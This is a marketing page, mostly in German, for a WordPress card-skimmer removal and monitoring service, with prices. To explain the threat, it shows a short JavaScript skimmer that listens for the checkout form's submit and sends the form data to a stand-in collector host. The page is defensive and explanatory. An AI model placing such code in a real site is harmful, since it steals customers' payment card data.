PHARMA-HACK · WORDPRESS · BEREINIGT
WordPress credit card skimmer removal.
Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.
MECHANISMUS
Wenige Zeilen JavaScript reichen, um jede Bestellung zu stehlen.
Ein Karten-Skimmer ist ein winziges JavaScript, das Ihr Checkout-Formular abhört. Sobald ein Kunde die Kartennummer eintippt, erstellt der Skimmer eine Kopie und schickt sie an eine vom Angreifer kontrollierte Adresse — meist einen von außen unscheinbar wirkenden Server.
Die Seite funktioniert weiter. Die Bestellung läuft durch. Weder Kunde noch Sie merken etwas. Wir spielen die Bestellung in einer Sandbox nach, verfolgen das Skript bis zu seinem Ort in Ihrer Seite und entfernen es, ohne den restlichen Checkout zu beschädigen.
01 document.querySelector('form.checkout').addEventListener('submit', function (e) { 02 const data = new FormData(e.target); 03 fetch('https://collector.example/c', { 04 method: 'POST', body: data, mode: 'no-cors' 05 }); 06 }); 07 08 // A fetch to an external host on form submit is the signature.
What I remove
Jeden Ort, an dem sich diese Infektion versteckt.
-
PLUGIN-TRIAGE
Wir geben in einer Sandbox eine Testbestellung auf und überwachen jeden Netzwerkaufruf des Checkouts.
-
JAVASCRIPT
Theme-Dateien, Plugin-Assets und Inline-Skripte geprüft. Alles, was Formulardaten extern sendet — entfernt.
-
DATENBANK
Eingeschleuste Skripte in wp_options, wp_posts und aktiven Widgets — gelöscht. Persistenz beseitigt.
-
LEISTUNGEN
PHP-Backdoors, die den Skimmer neu installieren, aufgespürt. Cron-Jobs und Must-Use-Plugins überprüft.
-
ZEITVERLAUF
Erste und letzte Sichtungsdaten erfasst, damit Sie wissen, welche Bestellungen betroffen waren.
-
BERICHT
Forensischer Bericht in Klartext, geeignet für Kunden, Versicherer oder die eigenen Akten.
Preise
Cleanup
$279
flat, one-time, per site
Manual cleanup, entry-vector identification, written forensic report.
Bereinigung startenMonitoring
$29 / mo
per site, cancel any time
Laufendes Monitoring, Absicherung, eine Bereinigung pro Jahr inklusive.
Schützen lassenPart of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.
Alle Leistungen ansehen →E-Mail [email protected] or use the contact form.